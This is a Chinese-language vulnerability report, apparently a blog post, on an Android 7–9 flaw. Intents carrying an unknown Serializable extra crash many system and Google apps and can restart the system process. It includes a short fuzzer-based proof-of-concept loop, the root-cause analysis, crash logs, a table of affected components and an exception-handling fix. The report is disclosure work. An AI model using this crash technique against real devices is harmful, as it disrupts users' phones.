bugreport_Android序列化参数intent导致的大量系统app崩溃重启通用bug
0x0 描述
通过IntentFuzzer工具对最新版android 9.0.0进行fuzz测试,发现诸多系统app皆存在同样的bug,可以让大部分app直接崩溃,最严重的可以让桌面(android:ui)直接重启。
这个问题可能存在于大量设备的大部分版本里面,目前我只测试了pixel_salifish的7.1.0 (NDE63H, Oct 2016)、8.1.0 (OPM4.171019.021.P1, Jul 2018)、9.0.0 (PPR2.181005.003.A1, Nov 2018)和master分支的
这个问题可能存在于大量设备的大部分版本里面,目前我只测试了pixel_salifish的7.1.0 (NDE63H, Oct 2016)、8.1.0 (OPM4.171019.021.P1, Jul 2018)、9.0.0 (PPR2.181005.003.A1, Nov 2018)和master分支的
aosp_salifish-userdebug Q PI eng.amd.20181105.110826 test-keys,这些版本均存在此类问题。0x1 示例版本
设备:pixel(salifish)
版本号:android 9.0.0(PPR2.181005.003.A1, Nov 2018)
即官方(https://developers.google.com/android/images#sailfish)目前最新版本:
版本号:android 9.0.0(PPR2.181005.003.A1, Nov 2018)
即官方(https://developers.google.com/android/images#sailfish)目前最新版本:
0x2 POC
基于开源的IntentFuzzer工具,主要攻击代码如下,对暴露的组件发送带序列化参数“test”的intent,少部分发送空intent也会导致崩溃:
fuzzAllSeBtn.setOnClickListener(new OnClickListener(){
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
for(ComponentName cmpName : components){
Intent intent = new Intent();
intent.setComponent(cmpName);
intent.putExtra("test", new SerializableTest());
if (sendIntentByType(intent, currentType)) {
Toast.makeText(FuzzerActivity.this, "Sent Serializeable " + intent, Toast.LENGTH_LONG).show();
} else {
Toast.makeText(FuzzerActivity.this, R.string.send_faild, Toast.LENGTH_LONG).show();
}
}
}
});
0x3 bug原因
当app接收到带序列化参数的intent时,如果代码中读取了参数,即便不使用读取序列化方式(readSerializable),仅仅如下图普通方式,依然会去实例序列化对象:
@ Override
protected void onCreate(Bundle savedInstanceState){
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
ButterKnife.bind(target:this);
getIntent().getIntExtra(name:"1234",defaultValue:1);
}
源码如下:
app接收到intent后,会通过
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/os/Parcel.java
app接收到intent后,会通过
Parcel.java相关代码进行解析,其中readVaule()方法会通过readInt()来读取参数类型:https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/os/Parcel.java
/**
* Read a typed object from a parcel. The given class loader will be
* used to load any enclosed Parcelables. If it is null, the default class
* loader will be used.
*/
public final Object readValue(ClassLoader loader) {
int type = readInt();
switch (type) {
case VAL_NULL:
return null;
case VAL_STRING:
return readString();
...
case VAL_BYTE:
return readByte();
//如果readInt()读取到值类型为`VAL_SERIALIZABLE`,则会调用readSerializable(loader)来解析intent参数
case VAL_SERIALIZABLE:
return readSerializable(loader);
case VAL_PARCELABLEARRAY:
return readParcelableArray(loader);
...
之后就会执行到BaseDexClassLoader的findClass,而findClass无法找到对象,从而抛出异常,最终app崩溃,部分进程如桌面(android:ui)崩溃后会重启
这意味着只要故意给目标app发一个不包含的class就会崩溃,这是一个通用问题。
app崩溃时第一个异常栈回溯如下:
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.weiqing.fuzzer.util.Utils$2" on path: DexPathList[[zip file "/data/app/com.weiqing.test-2/base.apk"],nativeLibraryDirectories=[/data/app/com.weiqing.test-2/lib/arm64, /data/app/com.weiqing.test-2/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
at java.lang.Class.classForName(Native Method)
at java.lang.Class.forName(Class.java:400)
at android.os.Parcel$2.resolveClass(Parcel.java:2616)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1772)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
at android.os.Parcel.readSerializable(Parcel.java:2624)
at android.os.Parcel.readValue(Parcel.java:2416)
at android.os.Parcel.readArrayMapInternal(Parcel.java:2732)
at android.os.BaseBundle.unparcel(BaseBundle.java:271)
at android.os.BaseBundle.getInt(BaseBundle.java:876)
at android.content.Intent.getIntExtra(Intent.java:6194)
at com.weiqing.test.MainActivity.onCreate(MainActivity.java:47)
at android.app.Activity.performCreate(Activity.java:6684)
at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1119)
at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2637)
at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2751)
at android.app.ActivityThread.-wrap12(ActivityThread.java)
at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1496)
at android.os.Handler.dispatchMessage(Handler.java:102)
at android.os.Looper.loop(Looper.java:154)
at android.app.ActivityThread.main(ActivityThread.java:6186)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:889)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:779)
0x4 修复建议
0x41 app层
所有app均添加异常处理,即可避免崩溃(BaseDexClassLoader依然会抛出异常)
@ Override
protected void onCreate(Bundle savedInstanceState){
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
ButterKnife.bind(target:this);
try{
getIntent().getIntExtra(name:"1234",defaultValue:1);
}catch(Exception e){
e.printStackTrace();
}
}
0x42 系统层
建议从系统层入手,但我的代码能力薄弱,给不了有效建议。
0x5 发现的问题
0x51 桌面(android:ui)崩溃重启
问题组件:android/com.android.internal.app.IntentForwarderActivity
崩溃日志:(logcat过滤指令: logcat -s *:E | grep FATAL -A 10)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: *** FATAL EXCEPTION IN SYSTEM PROCESS: main
11-29 18:48:42.499 4637 4637 E AndroidRuntime: java.lang.RuntimeException: Unable to start activity ComponentInfo{android/com.android.internal.app.IntentForwarderActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.android.intentfuzzer.util.SerializableTest)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2913)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:3048)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.servertransaction.LaunchActivityItem.execute(LaunchActivityItem.java:78)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:108)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:68)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1808)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.499 4637 4637 E AndroidRuntime: at com.android.server.SystemServer.run(SystemServer.java:454)
--
11-29 18:48:42.644 6211 6211 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.644 6211 6211 E AndroidRuntime: Process: com.android.intentfuzzer, PID: 6211
11-29 18:48:42.644 6211 6211 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.647 644 1689 E locSvc_FlpAdapter: E/void FlpLocationAdapter::offloadStopFlpSessionRequest(const FlpSessionKey &):1027]: there is no active flp session at all
11-29 18:48:42.647 5934 8248 E AndroidRuntime: FATAL EXCEPTION: IntentService[DropBoxEntryAddedChimeraService]
11-29 18:48:42.647 5934 8248 E AndroidRuntime: Process: com.google.android.gms, PID: 5934
11-29 18:48:42.647 5934 8248 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.647 5934 8248 E AndroidRuntime: at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:com.google.android.gms@[email protected] (100408-199405334):487)
11-29 18:48:42.647 5934 8248 E AndroidRuntime: at dcb.handleMessage(Unknown Source:6)
11-29 18:48:42.647 5934 8248 E AndroidRuntime: at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.647 5934 8248 E AndroidRuntime: at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.647 5934 8248 E AndroidRuntime: at android.os.HandlerThread.run(HandlerThread.java:65)
11-29 18:48:42.649 5934 8248 E BaseUncaughtHandler: Hit an exception while processing the UncaughtExceptionHandler. Original exception:
11-29 18:48:42.649 5934 8248 E BaseUncaughtHandler: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.649 5934 8248 E BaseUncaughtHandler: at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:com.google.android.gms@[email protected] (100408-199405334):487)
--
11-29 18:48:42.674 6292 6292 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.674 6292 6292 E AndroidRuntime: Process: com.android.vending, PID: 6292
11-29 18:48:42.674 6292 6292 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.870 4585 4585 E Zygote : Exit zygote because system server (4637) has terminated
11-29 18:48:42.951 633 633 E Diag_Lib: BluetoothDeathRecipient: Calling HAL close
11-29 18:48:43.131 8277 8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.131 8277 8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.172 8279 8279 E Netd : Error adding route 0.0.0.0/0 -> (null) dummy0 to table 1003: File exists
11-29 18:48:43.173 8279 8279 E Netd : Unable to create netlink socket: Protocol not supported
11-29 18:48:43.330 661 5729 E NxpHal : Ignoring read, HAL close triggered
11-29 18:48:43.667 8274 8274 E Typeface: Error mapping font file /system/fonts/NotoSerifEthiopic-Regular.otf
0x52 诸多app崩溃
| Apps | Problem components | intent type |
|---|---|---|
| android | android/com.android.internal.app.ConfirmUserCreationActivity | Null/Serializable |
| com.google.android.carriersetup | com.google.android.carriersetup/com.google.android.carriersetup.VzwSetupActivity | Serializable |
| com.android.cts.priv.ctsshim | com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewAuthority | Null/Serializable |
| com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewScheme | Null/Serializable | |
| com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewCategory | Null/Serializable | |
| com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.InstallPriority | Null/Serializable | |
| … | … | |
| almost all activity | Null/Serializable | |
| com.google.android.youtube | com.google.android.youtube/com.google.android.apps.youtube.app.application.Shell$SettingsActivity | Serializable |
| com.google.android.googlequicksearchbox | com.google.android.googlequicksearchbox/com.google.android.apps.gsa.staticplugins.opa.hq.ResizableOpaHqActivity | Serializable |
| com.google.android.googlequicksearchbox/com.google.android.apps.gsa.velour.DynamicActivityTrampoline | Serializable | |
| com.google.android.googlequicksearchbox/com.google.android.apps.gsa.speech.setupwizard.HotwordSetupWizardActivity | Serializable | |
| com.google.android.apps.gsa.bloblobber.receiver.BlobDownloadedReceiver | Serializable | |
| com.google.android.apps.gsa.search.core.location.LocationReceiver | Serializable | |
| android.process.media | com.android.providers.media.MediaScannerReceiver | Null |
| MediaScannerService | Serializable | |
| com.qti.service.colorservice | com.qti.service.colorservice | Null/Serializable |
| com.android.documentsui | com.android.documentsui/com.android.documentsui.ScopedAccessActivity | Serializable |
| com.android.htmlviewer | com.android.htmlviewer/com.android.htmlviewer.HTMLViewerActivity | Serializable |
| com.google.android.apps.multidevice.client | com.google.android.apps.multidevice.client/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.google.android.apps.multidevice.client/com.google.android.apps.multidevice.client.ui.pixel.SetupActivity | Serializable | |
| com.google.android.apps.multidevice.client.connection.PixelInitializer | Serializable | |
| com.google.android.apps.messaging | com.google.android.apps.messaging/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.google.android.apps.messaging/com.google.android.apps.messaging.ui.WidgetPickConversationActivity | Serializable | |
| com.google.android.apps.messaging/com.google.firebase.iid.FirebaseInstanceIdService | Serializable | |
| com.google.android.apps.messaging.shared.experiments.BuglePhenotypeBroadcastReceiver | Serializable | |
| com.google.android.apps.messaging/com.google.firebase.messaging.FirebaseMessagingService | Serializable | |
| com.google.android.soundpicker | com.google.android.soundpicker/com.google.android.soundpicker.PickerActivity | Serializable |
| com.google.android.configupdater | com.google.android.configupdater.CertPin.CertPinUpdateRequestReceiver | Serializable |
| com.google.android.configupdater.NetworkWatchlist.NetworkWatchlistUpdateRequestReceiver | Serializable | |
| com.android.vending | com.android.vending/com.google.android.wallet.instrumentmanager.redirect.ImFinishAndroidAppRedirectActivity | Serializable |
| com.android.vending/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable | |
| com.android.vending/com.google.android.finsky.family.setup.FamilySetupActivity | Serializable | |
| com.android.vending/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable | |
| com.google.android.finsky.setup.LauncherConfigurationReceiver | Serializable | |
| com.android.vending/com.google.firebase.iid.FirebaseInstanceIdService | Serializable | |
| com.android.certinstaller | com.android.certinstaller/com.android.certinstaller.CertInstallerMain | Serializable |
| com.google.android.marvin.talkback | com.google.android.marvin.talkback/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.android.egg | com.android.egg.octo.Ocquarium | Serializable |
| com.android.egg.neko.NekoLand | Serializable | |
| com.android.egg.neko.NekoActivationActivity | Serializable | |
| com.android.mtp | com.android.mtp/com.android.mtp.ReceiverActivity | Serializable |
| com.android.mtp.UsbIntentReceiver | Null/Serializable | |
| com.android.nfc | com.android.nfc.BeamShareActivity | Serializable |
| com.google.android.deskclock | com.google.android.deskclock/com.android.deskclock.DeskClock | Serializable |
| com.android.alarmclock.DigitalAppWidgetProvider | Null/Serializable | |
| com.qualcomm.qti.radioconfiginterface | RadioConfigService Null/Serializable | |
| com.google.android.as | com.google.android.as/com.google.android.apps.miphone.aiai.settings.ui.SettingsActivity | Serializable |
| com.google.android.gm | com.google.android.gm/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.google.android.gm/com.google.android.gm.CreateShortcutActivityGmail | Serializable | |
| com.google.android.gm/com.google.android.gm.ComposeActivityGmailExternal | Serializable | |
| com.android.email.service.EmailBroadcastReceiver | Null/Serializable | |
| com.google.android.carrier | com.google.android.carrier.CarrierSettingsReceiver | Null/Serializable |
| com.qualcomm.qti.auth.secureextauthservice | com.qualcomm.qti.auth.secureextauthservice.SecureExtAuthService | Null/Serializable |
| com.google.android.setupwizard | com.google.android.setupwizard/com.google.android.setupwizard.predeferred.PreDeferredSetupWizardActivity | Serializable |
| com.google.android.setupwizard/com.google.android.setupwizard.user.GoogleServicesWrapper | Serializable | |
| com.google.android.setupwizard/com.google.android.setupwizard.WizardManagerActivity | Null/Serializable | |
| com.google.android.setupwizard/com.google.android.setupwizard.predeferred.PreDeferredSetupWizardActivity | Serializable | |
| com.google.android.music | com.google.android.music/com.google.android.gms.appinvite.PreviewActivity | Serializable |
| com.google.android.music/com.google.android.music.ui.navigation.AppNavigationTrampolineActivity | Null/Serializable | |
| com.google.android.music/com.google.android.gms.appinvite.PreviewActivity | Serializable | |
| com.google.android.music/com.google.android.music.ui.navigation.ShortcutTrampolineActivity | Null/Serializable | |
| com.google.android.dialer | com.google.android.dialer/com.android.incallui.telecomeventui.InternationalCallOnWifiDialogActivity | Serializable |
| com.google.android.dialer/com.google.android.apps.dialer.main.GoogleMainActivity | Serializable | |
| com.android.voicemail.VoicemailSecretCodeReceiver | Null | |
| com.google.android.apps.cloudprint | com.google.android.apps.cloudprint/android.app.AliasActivity | Serializable |
| com.google.android.apps.cloudprint/com.google.android.apps.cloudprint.printdialog.AdvancedPrintOptionsActivity | Null/Serializable | |
| com.android.musicfx | com.android.musicfx/com.android.musicfx.Compatibility$Redirector | Serializable |
| com.android.musicfx/com.android.musicfx.ActivityMusic | Serializable | |
| com.android.musicfx.ControlPanelReceiver | Serializable | |
| com.android.musicfx.Compatibility$Receiver | Null | |
| com.google.android.apps.maps | com.google.android.apps.maps/com.google.android.gms.appinvite.PreviewActivity | Serializable |
| com.google.android.apps.maps/com.google.android.apps.gmm.car.firstrun.GmmProjectedFirstRunActivity | Serializable | |
| com.google.android.apps.maps/com.google.android.libraries.abuse.reporting.ReportAbuseActivity | Null | |
| com.google.android.apps.gmm.traffic.notification.service.TrafficToPlaceNotificationGeofenceReceiver | Serializable | |
| com.google.android.markup | com.google.android.markup/com.google.android.markup.AnnotateActivity | Serializable |
| com.android.cellbroadcastreceiver | com.android.cellbroadcastreceiver.CellBroadcastListActivity | Serializable |
| com.android.cellbroadcastreceiver.CellBroadcastSettings | Serializable | |
| com.google.android.contacts | com.google.android.contacts/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.android.keychain | com.android.keychain/com.android.keychain.KeyChainActivity | Serializable |
| com.google.android.calculator | com.google.android.calculator2.Calculator | Serializable |
| com.google.android.calculator2.Licenses | Serializable | |
| com.android.chrome | com.android.chrome/com.android.webview.chromium.LicenseActivity | Serializable |
| com.android.chrome/org.chromium.chrome.browser.browseractions.BrowserActionActivity | Serializable | |
| com.qualcomm.qti.rcsbootstraputil | com.qualcomm.qti.rcsbootstraputil.RCSReceiver | Null/Serializable |
| com.google.android.packageinstaller | com.google.android.packageinstaller/com.android.packageinstaller.InstallStart | Serializable |
| com.google.android.gms | com.google.android.gms/com.google.firebase.auth.api.gms.ui.BrowserSignInResponseHandlerActivity | Null |
| com.google.android.gms/com.google.android.gms.matchstick.ui.ConversationListActivity | Null | |
| com.google.android.gms/com.google.android.gms.wallet.buyflow.CheckoutActivity | Null | |
| com.google.android.gms/com.google.android.gms.smartdevice.magicwand.MagicWandActivity | Null | |
| com.google.android.gms/com.google.android.gms.googlehelp.contact.chat.ChatSupportRequestFormActivity | Null | |
| com.google.android.gms/com.google.android.gms.auth.api.credentials.ui.CredentialsSaveConfirmationActivity | Null | |
| com.google.android.gms/com.google.android.gms.family.v2.invites.SendInvitationsActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.trustagent.discovery.OnbodyPromotionActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.tapandpay.settings.TapAndPaySettingsActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.matchstick.call.CallEntryActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.locationsharing.activity.OnboardingActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.instantapps.settings.SettingsActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.games.PlayGamesUpgradeActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.car.FirstActivity | Serializable | |
| com.google.android.gms/com.google.android.gms.backup.component.BackupSettingsActivity | Serializable | |
| com.google.android.gms.auth.api.credentials.openyolo.provider.CredentialQueryReceiver | Serializable | |
| com.google.android.gms.checkin.CheckinServiceTriggerReceiver | Serializable | |
| com.google.android.gms.gcm.GcmSenderProxy | Serializable | |
| com.google.android.gms.update.SystemUpdateServiceActiveReceiver | Serializable | |
| com.google.android.libraries.social.autobackup.PicasaQuotaChangedReceiver | Serializable | |
| com.google.android.gms.vision.DependencyBroadcastReceiverProxy | Serializable | |
| com.google.android.gms.trustagent.BluetoothDeviceBondStateBroadcastReceiver | Serializable | |
| com.google.android.gms.checkin.CheckinService | Null/Serializable | |
| com.google.android.gms/.fitness.service.recording.FitRecordingBroker | Null/Serializable | |
| com.google.android.gms/.carsetup.wifi.CarWifiConnectionService | Serializable | |
| com.google.android.gms/com.google.firebase.messaging.FirebaseMessagingService | Serializable | |
| com.google.android.gsf | com.google.android.gsf/com.google.android.gsf.settings.ConfirmLgaaylActivity | Serializable |
| com.google.android.gsf/com.google.android.gsf.settings.UseLocationForServicesActivity | Serializable | |
| com.google.android.tag | com.google.android.tag/com.android.apps.tag.TagViewer | Serializable |
| com.google.android.tts | com.google.android.tts/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.google.android.partnersetup | com.google.android.partnersetup.RlzPingBroadcastReceiver | Null/Serializable |
| com.android.safetyregulatoryinfo | com.android.safetyregulatoryinfo.SafetyAndRegulatoryInfoActivity | Serializable |
| com.google.android.videos | com.google.android.videos/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.google.android.videos/com.google.android.videos.presenter.activity.AuxiliaryActivity | Serializable | |
| com.google.android.videos.mobile.presenter.activity.RestrictionsActivity$Receiver | Serializable | |
| com.google.android.apps.nexuslauncher | com.google.android.apps.nexuslauncher.reflection.NewAppInstallReceiver$V26 | Null/Serializable |
| com.android.launcher3.SessionCommitReceiver | Null/Serializable | |
| com.android.carrierdefaultapp | com.android.carrierdefaultapp.CarrierDefaultBroadcastReceiver | Null/Serializable |
| com.google.SSRestartDetector | com.google.SSRestartDetector.SSRHandler | Null/Serializable |
| com.google.android.feedback | com.google.android.feedback/com.google.android.feedback.FeedbackActivity | Null/Serializable |
| com.google.android.apps.photos | com.google.android.apps.photos/com.google.android.libraries.abuse.reporting.ReportAbuseActivity | Null |
| com.google.android.apps.photos/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable | |
| com.google.android.calendar | com.google.android.calendar/com.android.calendar.AllInOneActivity | Serializable |
| com.android.managedprovisioning | com.android.managedprovisioning/com.android.managedprovisioning.finalization.FinalizationActivity | Serializable |
| com.android.wallpaper.livepicker | com.android.wallpaper.livepicker/com.android.wallpaper.livepicker.LiveWallpaperChange | Serializable |
| com.android.settings | com.android.settings/com.android.settings.Settings$ManageAppExternalSourcesActivity | Null |
| com.android.settings/com.android.settings.bluetooth.DevicePickerActivity | Null | |
| com.android.settings/com.android.settings.Settings$IccLockSettingsActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$TextToSpeechSettingsActivity | Serializable | |
| com.android.settings/com.android.settings.password.ConfirmDeviceCredentialActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$DevelopmentSettingsDashboardActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$WifiDisplaySettingsActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$UsageAccessSettingsActivity | Serializable | |
| com.android.settings/com.android.settings.bluetooth.BluetoothPairingDialog | Null | |
| com.android.settings/com.android.settings.applications.InstalledAppDetailsTop | Null | |
| com.android.settings.bluetooth.BluetoothPairingRequest | Null | |
| com.android.settings/com.android.settings.Settings$ZenModeSettingsActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$MobileDataUsageListActivity | Serializable | |
| com.android.settings/com.android.settings.Settings$UsageAccessSettingsActivity | Serializable | |
| com.google.android.wfcactivation/com.google.android.wfcactivation.WfcActivationActivity | Serializable | |
| com.google.android.apps.pixelmigrate | com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.CloudRestoreFlowActivity | Null |
| com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.RestoreProgressActivity | Serializable | |
| com.google.android.apps.pixelmigrate.util.SetupWizardLifecycleReceiver | Serializable | |
| com.google.android.settings.intelligence | com.google.android.settings.intelligence/com.google.android.settings.intelligence.modules.suggestions.NightlightTrampolineActivity | Serializable |
| com.google.android.settings.intelligence.libs.experiment.PhenotypeBroadcastReceiver | Serializable | |
| com.google.android.tetheringentitlement | com.google.android.tetheringentitlement/com.google.android.tetheringentitlement.CarrierEntitlementActivity | Serializable |
| com.android.cts.ctsshim | com.android.cts.ctsshim/com.android.cts.ctsshim.InstallPriority | Null/Serializable |
| com.android.vpndialog | com.android.vpndialogs/com.android.vpndialogs.ConfirmDialog | Serializable |
| com.google.android.apps.wallpaper | com.google.android.apps.wallpaper/com.google.android.apps.wallpaper.picker.StandalonePreviewActivity | Serializable |
| com.google.android.apps.wallpaper.module.GoogleAlarmInitializer | Null | |
| com.google.android.talk | com.google.android.talk/com.google.android.apps.hangouts.stub.PlayStoreRedirectActivity | Serializable |
| com.android.phone | com.android.phone/com.android.phone.NetworkSelectSettingActivity | Null |
| com.android.phone/com.android.phone.settings.VoicemailSettingsActivity | Serializable | |
| com.android.services.telephony.sip.SipIncomingCallReceiver | Null/Serializable | |
| com.google.vr.vrcore | com.google.vr.vrcore/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable |
| com.android.emergency | all activity | Serializable |
| com.android.systemui | com.android.systemui/com.android.systemui.ForegroundServicesDialog | Serializable |
| com.android.systemui/com.android.systemui.SlicePermissionActivity | Serializable | |
| com.android.systemui/com.android.systemui.media.MediaProjectionPermissionActivity | Serializable | |
| com.android.traceur | com.android.traceur.MainActivity | Serializable |
| com.google.android.apps.helprtc | com.google.android.apps.helprtc/com.google.android.apps.helprtc.ui.InvitationActivity | Serializable |
| com.google.android.apps.gcs | com.google.android.apps.gcs/com.google.android.apps.gcs.WifiAssistantOptInActivity | Serializable |
| com.android.bluetooth | com.android.bluetooth.opp.BluetoothOppReceiver | Null/Serializable |
| com.android.bluetooth/.pbap.BluetoothPbapService | Serializable | |
| com.android.captiveportallogin | com.android.captiveportallogin/com.android.captiveportallogin.CaptivePortalLoginActivity | Null/Serializable |
| com.google.android.GoogleCamera | com.google.android.GoogleCamera/com.google.android.apps.camera.legacy.app.activity.CameraDeepLinkActivity | Null |
| com.google.android.GoogleCamera/com.google.android.libraries.social.licenses.LicenseMenuActivity | Serializable | |
| com.android.connectivity.metrics | com.android.connectivity.metrics.SnapshotSchedulingReceiver | Null/Serializable |
| com.google.android.inputmethod.latin | com.google.android.inputmethod.latin/com.google.android.apps.inputmethod.libs.search.sticker.AppIndexingActivity | Serializable |
| com.google.android.gms.analytics.CampaignTrackingReceiver | Serializable | |
| com.google.android.storagemanager | com.google.android.storagemanager/com.android.storagemanager.deletionhelper.DeletionHelperActivity | Serializable |
0x6 最后
由于本地crash问题影响太微弱,虽然这是通用型bug,但依然不符合Google对漏洞的定位(DOS类型至少要求系统重启),已经被忽略😂😂😂
想请问下,楼主对于Android漏洞挖掘有什么比较好用开源工具可以介绍吗
回复删除